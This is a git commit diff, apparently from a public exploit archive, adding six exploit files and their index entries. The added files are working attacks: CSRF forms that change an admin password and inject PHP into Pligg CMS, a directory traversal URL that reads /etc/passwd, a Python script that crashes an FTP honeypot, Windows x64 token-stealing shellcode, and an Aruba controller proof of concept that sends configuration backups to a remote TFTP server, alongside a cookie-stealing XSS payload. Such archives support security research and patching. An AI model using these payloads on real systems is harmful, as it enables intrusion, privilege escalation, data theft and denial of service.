DB: 2015-08-21
6 new exploits
This commit is contained in:
parent
1ef6c23cb9
commit
6dccd55e18
7 changed files with 251 additions and 1 deletions
|
@ -10740,7 +10740,7 @@ id,file,description,date,author,platform,type,port
|
|||
11739,platforms/php/webapps/11739.txt,"PHP Classifieds 7.5 - Blind SQL Injection Vulnerability",2010-03-15,ITSecTeam,php,webapps,0
|
||||
11740,platforms/php/webapps/11740.txt,"Ninja RSS Syndicator 1.0.8 - Local File Include",2010-03-15,jdc,php,webapps,0
|
||||
11741,platforms/php/webapps/11741.txt,"Phenix 3.5b - SQL Injection Vulnerability",2010-03-15,ITSecTeam,php,webapps,0
|
||||
11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 Pre-Authentication Buffer Overflow (meta)",2010-03-15,blake,windows,remote,0
|
||||
11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Buffer Overflow (meta)",2010-03-15,blake,windows,remote,0
|
||||
11743,platforms/php/webapps/11743.txt,"Joomla component com_rpx Ulti RPX 2.1.0 - Local File Include",2010-03-15,jdc,php,webapps,0
|
||||
11744,platforms/php/webapps/11744.txt,"Duhok Forum 1.0 script Cross-Site Scripting Vulnerability",2010-03-15,indoushka,php,webapps,0
|
||||
11745,platforms/php/webapps/11745.txt,"FreeHost 1.00 - Upload Vulnerability",2010-03-15,indoushka,php,webapps,0
|
||||
|
@ -34204,3 +34204,9 @@ id,file,description,date,author,platform,type,port
|
|||
37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 XSS And CSRF Add Admin Exploit",2015-08-19,LiquidWorm,php,webapps,9999
|
||||
37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999
|
||||
37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999
|
||||
37889,platforms/linux/remote/37889.txt,"YingZhiPython Directory Traversal and Arbitrary File Upload Vulnerabilities",2012-09-26,"Larry Cashdollar",linux,remote,0
|
||||
37891,platforms/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343
|
||||
37892,platforms/asp/webapps/37892.txt,"Vifi Radio v1 - CSRF Vulnerability",2015-08-20,KnocKout,asp,webapps,80
|
||||
37893,platforms/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack-Based Buffer Overflow",2015-08-20,"_ Un_N0n _",windows,dos,21
|
||||
37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80
|
||||
37895,platforms/win64/shellcode/37895.asm,"Win2003 x64 - Token Stealing shellcode - 59 bytes",2015-08-20,"Fitzl Csaba",win64,shellcode,0
|
||||
|
|
Can't render this file because it is too large.
|
51
platforms/asp/webapps/37892.txt
Executable file
51
platforms/asp/webapps/37892.txt
Executable file
|
@ -0,0 +1,51 @@
|
|||
.__ _____ _______
|
||||
| |__ / | |___ __\ _ \_______ ____
|
||||
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
|
||||
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|
||||
|___| /\____ |/__/\_ \\_____ /__| \___ >
|
||||
\/ |__| \/ \/ \/
|
||||
_____________________________
|
||||
/ _____/\_ _____/\_ ___ \
|
||||
\_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com
|
||||
/ \ | \\ \____
|
||||
/_______ //_______ / \______ /
|
||||
\/ \/ \/
|
||||
Vifi Radio v1 - CSRF (Arbitrary Change Password) Exploit
|
||||
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
[+] Discovered by: KnocKout
|
||||
[~] Contact : knockout@e-mail.com.tr
|
||||
[~] HomePage : http://h4x0resec.blogspot.com / http://milw00rm.com
|
||||
[~] Greetz: BARCOD3, ZoRLu, b3mb4m, _UnDeRTaKeR_, DaiMon, VoLqaN, EthicalHacker,
|
||||
Oguz Dokumaci ( d4rkvisuaL ) Septemb0x, KedAns-Dz, indushka, Kalashinkov
|
||||
############################################################
|
||||
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|~Web App. : Vifi Radio
|
||||
|~Affected Version : v1
|
||||
|~Software : http://scriptim.org/market-item/vifi-v1-radyo-scripti/ & http://vifibilisim.com/scriptlerimiz-29-Radyo_Siteleri_Icin_Script.html
|
||||
|~Official Demo : http://radyo.vifibilisim.com
|
||||
|~RISK : Medium
|
||||
|~DORK : inurl:index.asp?radyo=2
|
||||
|~Tested On : [L] Windows 7, Mozilla Firefox
|
||||
########################################################
|
||||
----------------------------------------------------------
|
||||
PoC
|
||||
----------------------------------------------------------
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://[TARGET]/yonetim/kullanici-kaydet.asp?tur=g" method="POST">
|
||||
<input type="hidden" name="rutbe" value="1" />
|
||||
<input type="hidden" name="djadi" value="0" />
|
||||
<input type="hidden" name="resim" value="Vifi+Bili%FEim" />
|
||||
<input type="hidden" name="firma" value="USERNAME" />
|
||||
<input type="hidden" name="link" value="PASSWORD" />
|
||||
<input type="hidden" name="sira" value="23" />
|
||||
<input type="hidden" name="ilet" value="G%D6NDER" />
|
||||
<input type="hidden" name="Submit" value="Exploit!" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
############################
|
||||
"Admin Panel: /yonetim "
|
||||
############################
|
7
platforms/linux/remote/37889.txt
Executable file
7
platforms/linux/remote/37889.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/55685/info
|
||||
|
||||
An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and to run it in the context of the web server process.
|
||||
|
||||
YingZhiPython 1.9 is vulnerable; other versions may also be affected.
|
||||
|
||||
ftp://www.example.com/../../../../../../../private/etc/passwd
|
56
platforms/php/webapps/37894.html
Executable file
56
platforms/php/webapps/37894.html
Executable file
|
@ -0,0 +1,56 @@
|
|||
<!--
|
||||
# Exploit Title: Pligg CMS Arbitrary Code Execution
|
||||
# Google Dork: intext:"Made wtih Pligg CMS"
|
||||
# Date: 2015/8/20
|
||||
# Exploit Author: Arash Khazaei
|
||||
# Vendor Homepage: http://pligg.com
|
||||
# Software Link:
|
||||
https://github.com/Pligg/pligg-cms/releases/download/2.0.2/2.0.2.zip
|
||||
# Version: 2.0.2
|
||||
# Tested on: Kali , Iceweasel Browser
|
||||
# CVE : N/A
|
||||
# Contact : http://twitter.com/0xClay
|
||||
# Mail : 0xclay@gmail.com
|
||||
# Site : http://bhunter.ir
|
||||
|
||||
# Description :
|
||||
|
||||
# Pligg CMS Is A CMS Writed In PHP Language And Licensed Under GPL V 2.0
|
||||
# In Pligg CMS Panel In Adding Page Section Pligg CMS Allow To Admin Add
|
||||
PHP Codes In {php} {/php} Tags
|
||||
# A CSRF Vulnerabilty In Adding Page Section Allow To Attacker To Execute
|
||||
PHP Codes On Server .
|
||||
# In This Exploit I Just Added a echo '<h1> Hacked </h1>'; Code You Can
|
||||
Customize Exploit For Your Self .
|
||||
|
||||
# Exploit :
|
||||
-->
|
||||
|
||||
<html>
|
||||
<body onload="document.exploit.submit();">
|
||||
<form action="http://localhost/pligg-cms/admin/submit_page.php"
|
||||
method="POST" id="thisform" name="exploit">
|
||||
<input type="hidden" name="page_title" id="page_title"
|
||||
size="66"value="Hacked"/>
|
||||
<input type="hidden" name="page_url" id="page_url" size="66"
|
||||
value="Hacked"/>
|
||||
<input type="hidden" name="page_keywords" id="page_keywords" size="66"
|
||||
value="Hacked"/>
|
||||
<input type="hidden" name="page_description" id="page_description"
|
||||
size="66" value="Hacked"/>
|
||||
<textarea type="hidden"id="textarea-1" name="page_content"
|
||||
class="form-control page_content" rows="15"> {php}echo '<h1> Hacked </h1>';
|
||||
{/php} </textarea>
|
||||
<input type="hidden" name="process" value="new_page" />
|
||||
<input type="hidden" name="randkey" value="12412532" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<!--
|
||||
# After HTML File Executed You Can Access Page In
|
||||
http://localhost/pligg-cms/page.php?page=Hacked
|
||||
|
||||
|
||||
# Discovered By Arash Khazaei . (Aka JunkyBoy (Nick Name Changed :P ))
|
||||
-->
|
56
platforms/win64/shellcode/37895.asm
Executable file
56
platforms/win64/shellcode/37895.asm
Executable file
|
@ -0,0 +1,56 @@
|
|||
;token stealing shellcode Win 2003 x64
|
||||
;based on the widely available x86 version
|
||||
;syntax for NASM
|
||||
;Author: Csaba Fitzl, @theevilbit
|
||||
|
||||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||||
;important structures and offsets;
|
||||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||||
|
||||
;kd> dt -r1 nt!_TEB
|
||||
; +0x110 SystemReserved1 : [54] Ptr64 Void
|
||||
;??????+0x078 KTHREAD <----- NOT DOCUMENTED, can't get it from WINDBG directly
|
||||
|
||||
;kd> dt -r1 nt!_KTHREAD
|
||||
; +0x048 ApcState : _KAPC_STATE
|
||||
; +0x000 ApcListHead : [2] _LIST_ENTRY
|
||||
; +0x020 Process : Ptr64 _KPROCESS
|
||||
|
||||
;kd> dt -r1 nt!_EPROCESS
|
||||
; +0x0d8 UniqueProcessId : Ptr64 Void
|
||||
; +0x0e0 ActiveProcessLinks : _LIST_ENTRY
|
||||
; +0x000 Flink : Ptr64 _LIST_ENTRY
|
||||
; +0x008 Blink : Ptr64 _LIST_ENTRY
|
||||
; +0x160 Token : _EX_FAST_REF
|
||||
; +0x000 Object : Ptr64 Void
|
||||
; +0x000 RefCnt : Pos 0, 4 Bits
|
||||
; +0x000 Value : Uint8B
|
||||
|
||||
BITS 64
|
||||
|
||||
global start
|
||||
|
||||
section .text
|
||||
|
||||
start:
|
||||
mov rax, [gs:0x188] ;Get current ETHREAD in
|
||||
mov rax, [rax+0x68] ;Get current EPROCESS address
|
||||
mov rcx, rax ;Copy current EPROCESS address to RCX
|
||||
|
||||
find_system_process:
|
||||
mov rax, [rax+0xe0] ;Next EPROCESS ActiveProcessLinks.Flink
|
||||
sub rax, 0xe0 ;Go to the beginning of the EPROCESS structure
|
||||
mov r9 , [rax+0xd8] ;Copy PID to R9
|
||||
cmp r9 , 0x4 ;Compare R9 to SYSTEM PID (=4)
|
||||
jnz short find_system_process ;If not SYSTEM got to next EPROCESS
|
||||
|
||||
stealing:
|
||||
mov rdx, [rax+0x160] ;Copy SYSTEM process token address to RDX
|
||||
mov [rcx+0x160], rdx ;Steal token with overwriting our current process's token address
|
||||
retn 0x10
|
||||
|
||||
;byte stream:
|
||||
;"\x65\x48\x8b\x04\x25\x88\x01\x00\x00\x48\x8b\x40\x68\x48\x89\xc1"
|
||||
;"\x48\x8b\x80\xe0\x00\x00\x00\x48\x2d\xe0\x00\x00\x00\x4c\x8b\x88"
|
||||
;"\xd8\x00\x00\x00\x49\x83\xf9\x04\x75\xe6\x48\x8b\x90\x60\x01\x00"
|
||||
;"\x00\x48\x89\x91\x60\x01\x00\x00\xc2\x10\x00"
|
41
platforms/windows/dos/37893.py
Executable file
41
platforms/windows/dos/37893.py
Executable file
|
@ -0,0 +1,41 @@
|
|||
"""
|
||||
********************************************************************************************
|
||||
# Exploit Title: Valhala Honeypot Stack based BOF(Remote DOS)
|
||||
# Date: 8/20/2015
|
||||
# Exploit Author: Un_N0n
|
||||
# Software Developer: Marcos Flavio Araujo Assuncao
|
||||
# Software Link: http://sourceforge.net/projects/valhalahoneypot/
|
||||
# Version: 1.8
|
||||
# Tested on: Windows 7 x86(32 BIT)
|
||||
********************************************************************************************
|
||||
|
||||
[Steps to Produce the Crash]:
|
||||
1- Open 'honeypot.exe'.
|
||||
2- Enter the IP of the machine on which this honeypot is running, in this case it is your own
|
||||
machine i.e 127.0.0.1.
|
||||
3- Run the script.
|
||||
~ Software crashes.
|
||||
|
||||
|
||||
[Code to crash honeypot]:
|
||||
==============================================================
|
||||
"""
|
||||
import socket
|
||||
|
||||
while True:
|
||||
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||
s.connect(("IP_ADDR",21))
|
||||
s.send('USER test\r\n')
|
||||
s.send('PASS test\r\n')
|
||||
s.send('ABOR '+'A'*2000+'\r\n')
|
||||
s.recv(1024)
|
||||
s.send('ABOR '+'A'*5000+'\r\n')
|
||||
s.recv(1024)
|
||||
s.send('ABOR '+'A'*6000+'\r\n')
|
||||
s.recv(1024)
|
||||
s.send('QUIT\r\n')
|
||||
s.close()
|
||||
|
||||
==============================================================
|
||||
|
||||
**********************************************************************************************
|
33
platforms/xml/webapps/37891.txt
Executable file
33
platforms/xml/webapps/37891.txt
Executable file
|
@ -0,0 +1,33 @@
|
|||
# Title: Aruba Mobility Controller CSRF And XSS Vulnerabilities
|
||||
# Date: 08/016/2015
|
||||
# Author: Itzik Chen (itzik1 at gmail.com)
|
||||
# Product web page: http://www.arubanetworks.com
|
||||
# Affected Version: 6.4.2.8
|
||||
# Tested on: Aruba7240, Ver 6.2.4.8
|
||||
|
||||
|
||||
|
||||
Summary
|
||||
================
|
||||
|
||||
Aruba Networks is an HP company, one of the leaders in enterprise Wi-Fi.
|
||||
Arube Controller suffers from CSRF and XSS vulnerabilities.
|
||||
|
||||
|
||||
|
||||
Proof of Concept - CSRF
|
||||
=========================
|
||||
|
||||
192.168.0.1 - Controller IP-Address
|
||||
172.17.0.1 - Remote TFTP server
|
||||
|
||||
<IMG width=1 height=1 SRC="https://192.168.0.1:4343/screens/cmnutil/copyLocalFileToTftpServerWeb.xml?flashbackup.tar.gz,172.17.0.1,flashbackup.tar.gz">
|
||||
|
||||
That will send the flashbackup configuration file to a remote TFTP server.
|
||||
|
||||
|
||||
|
||||
Proof of Concept - XSS
|
||||
=========================
|
||||
|
||||
https://192.168.0.1:4343/screens/switch/switch_mon.html?mode=plog-custom&mode-title=test</td><img width=1 height=1 src=/images/logo-mobility-controller.gif onLOAD=alert(document.cookie)>
|
Loading…
Add table
Reference in a new issue